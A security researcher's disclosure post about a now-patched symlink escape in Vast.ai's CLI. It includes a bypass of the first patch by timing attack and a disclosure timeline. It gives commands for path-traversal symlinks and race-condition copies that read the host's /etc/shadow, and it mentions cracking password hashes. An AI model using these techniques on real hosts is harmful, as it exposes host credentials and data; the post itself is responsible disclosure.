Symlink exploit in Vast.ai
https://docs.vast.ai/faq says “Clients are isolated to unprivileged docker containers and only have access to their own data.”
This is incorrect. By abusing symlinks, a malicious client can read every file on the host’s machine, including `/etc/shadow`.
That’s a quote from my email to Vast.ai, alerting them to the bug. (/etc/shadow
contains the hash of every user’s password.)
Vast.ai promptly responded to that email, and the exploit is now patched.
If you downloaded any software binaries from a Vast.ai instance (which includes PyTorch .pt
files—use safetensors instead), I recommend only running them in a sandbox.
(If you want to disclose a vulnerability to Vast.ai, go here.)
1. Discovery
Clients can use Vast.ai to rent time on GPU servers from hosts. I didn’t want to blow my compute budget, so I would stop my container while not running experiments. Normally when a container is stopped, you can’t do anything in it.
But Vast.ai’s command-line interface (CLI) allowed you to copy files to/from your container and run ls
, even when the container was stopped.
I was curious how this worked. I (wrongly) thought that Vast.ai would temporarily activate the container, run ls
, capture the output, and then stop the container. To test this, inside a running container I made a symlink inside the root directory, pointing up one more directory:
ln -s .. a_symlink
If you run ls
on the symlink, it just shows you the contents of the root directory:
root@cfc6e2306b3a:/# ls /
a_symlink boot etc lib lib64 media opt root sbin sys usr
bin dev home lib32 libx32 mnt proc run srv tmp var
root@cfc6e2306b3a:/# ls a_symlink
a_symlink boot etc lib lib64 media opt root sbin sys usr
bin dev home lib32 libx32 mnt proc run srv tmp var
This is normal—the root directory is the top-most directory in that container, so if you try to look in the parent, you just get the root directory again.
(I’m simulating the bug using a container on my laptop—these are not real terminal outputs from Vast.ai.)
Then I used the Vast.ai CLI to run ls
on that same symlink, and I got something different:
diff link lower merged work
Now the container’s root directory had a parent. This meant that the CLI’s ls
was actually the host server’s ls
, running outside the container’s sandbox.
If I remember correctly, the CLI had some basic sanitization: if you tried ls ..
, it wouldn’t work. But symlinks weren’t checked.
2. Mapping the exploit
I discovered that the CLI’s copy
command also had the same bug: You could copy files from the host to your container. Then you could use scp
or rsync
as normal to copy the files off the server.
Normally there are limits to what files you can read on a Linux computer, even if you’re not in a sandbox. Users can make their sensitive files (e.g. SSH keys) readable only by themselves. But the CLI’s copy
command was designed to work with files from stopped docker containers, and those live in /var/lib/docker
. Only the root user can look inside /var/lib/docker
. So the CLI’s copy
had root permissions. Hence this exploit allows a malicious user to see even the protected files on the host machine.
I wasn’t able to manipulate files on the server that were outside of the container. But a determined hacker conceivably could have taken this attack further. From my email to Vast.ai:
It still may be possible for an attacker to gain shell access to some machines. For instance, the host may have used a less secure password that is easy to crack once you have access to `/etc/shadow`.
3. Patching the exploit
Vast.ai patched the exploit and asked me to check it was fixed. I found that a timing attack could get around their patch. They developed a second patch, and I confirmed that the exploit was now gone.
(This section is more technical and just describes the timing attack. Feel free to skip to the timeline.)
Here’s what I sent to Vast.ai about the timing attack:
Technical details on Exploit 2.0 [the timing attack]:
# Theory
There now appears to be a filter that blocks the original Exploit 1.0.
(I don't know exactly how the filter works, so some of the theoretical details here may be off.)
That is, the `ls`, `du`, and `copy` commands skip symlinks that would point to the host's data. Unfortunately there is a race condition in this filtering. A malicious client can create a file and rapidly change its state among:
(1) An ordinary file
(2) A directory
(3) An innocent symlink that stays within the client's data
(4) A malicious symlink that points at the host's data
(I haven't checked if all four of these states are necessary for the exploit.)
If the malicious client runs `copy` on this file, occasionally the following happens:
(1) the filter will see the file when it is in an innocent state
(2) the copy is approved
(3) the file changes to a malicious symlink
(4) the copy happens, leaking the host's data
This timing attack can be scripted to make it fairly reliable.
# Example: `ls /home`
On the rented instance, I ran
```
python3 mixed_entries.py folder2 foo ../../../../../../../../../../home/ --count 1000
```
Here `mixed_entries.py` is a script that creates a directory `folder2`, containing 1000 files. Each of these files cycles between:
(1) An ordinary file containing "spam"
(2) An empty directory
(3) An innocent symlink to `foo`
(4) The malicious symlink to `../../../../../../../../../../home/`
I've attached this script [to the original email, but not to this post. It's a simple script that Claude wrote.]
On my laptop, I ran
```
while true; uv run vastai execute 20047631 "ls -l /root/folder2/entry_0/"; echo iteration done; end
```
(Note this is a fish loop and will need slight modifications to run in bash.)
After running iterations for a few minutes, I received this output:
```
total 4
drwxr-xr-x 6 user user 4096 Nov 16 2023 user
```
This shows the host's `/home` contains a user called `user` (the client container I was inside did not have a user called `user`).
# Example: Accessing /etc/shadow
On the rented instance, I ran
```
python3 mixed_entries.py folder foo ../../../../../../../../../../etc/shadow --count 1000
```
On my laptop, I ran
```
uv run vastai copy 20047631:/root/folder 20047631:/tmp/target
```
After the copy completed, I examined `/tmp/target/folder` with `ls -Sl | head`. The host's `/etc/shadow` is larger than the fake files created by `mixed_entries.py`, so it should show up first. I looked at the first file (in my case `/tmp/target/folder/entry_111`), and it contained the contents of the host's `/etc/shadow` (e.g. an entry for `user`).
A malicious client would then work on cracking the host's password and obtaining shell access to the machine, or looking around for more sensitive information to copy.
Exploit 2.0 is slightly weaker than Exploit 1.0, since I didn't find a way to recursively copy directories and their contents (when I tried, I received a tree of directories, but none of their contents. I may have overlooked something). So this could mildly hinder a hacker who wanted to copy lots of data.
4. Timeline
2025-03-18: I discovered that symlinks behaved weirdly
2025-03-22: I mapped the exploit
2025-03-22, 17:48: I sent an email to contact@vast.ai, support@vast.ai, and compliance@vast.ai, asking them how to securely send a description of the exploit.
2025-03-26: I hadn’t received a response yet, so I reached out to Vast.ai’s support chat to ask how to send the exploit. A Vast.ai engineer helpfully provided their official email.
2025-03-26, 10:27: I sent that engineer a description of the exploit.
2025-03-26, 19:37: Vast.ai reached out to me and confirmed they were working on a patch.
2025-04-01: I noticed that Vast.ai had disabled the CLI’s
ls
command (this mitigation may have happened before this)2025-04-19: I noticed that the CLI’s
copy
command now didn’t work on symlinks pointing outside the container.2025-05-10, 02:00: Vast.ai reported that the exploit was fixed and asked me to confirm.
2025-05-11: I investigated and found that a timing attack could get around the patch.
2025-05-12, 15:17: I reported this to Vast.ai.
2025-05-13, 17:22: Vast.ai confirmed they were working on a second fix.
2025-05-15: Vast.ai paid me a bug bounty.
2025-06-30, 21:16: Vast.ai reported that Exploit 2.0 was fixed and asked me to confirm.
2025-07-15, 22:45: I confirmed that I could no longer find an exploit. (The delay was my fault because I was on holiday.)
2025-07-24: Vast.ai agreed that this would be the disclosure date.
(All times are London time)
5. Acknowledgements
From February 3 to April 4, I was funded by the Pivotal Research Fellowship.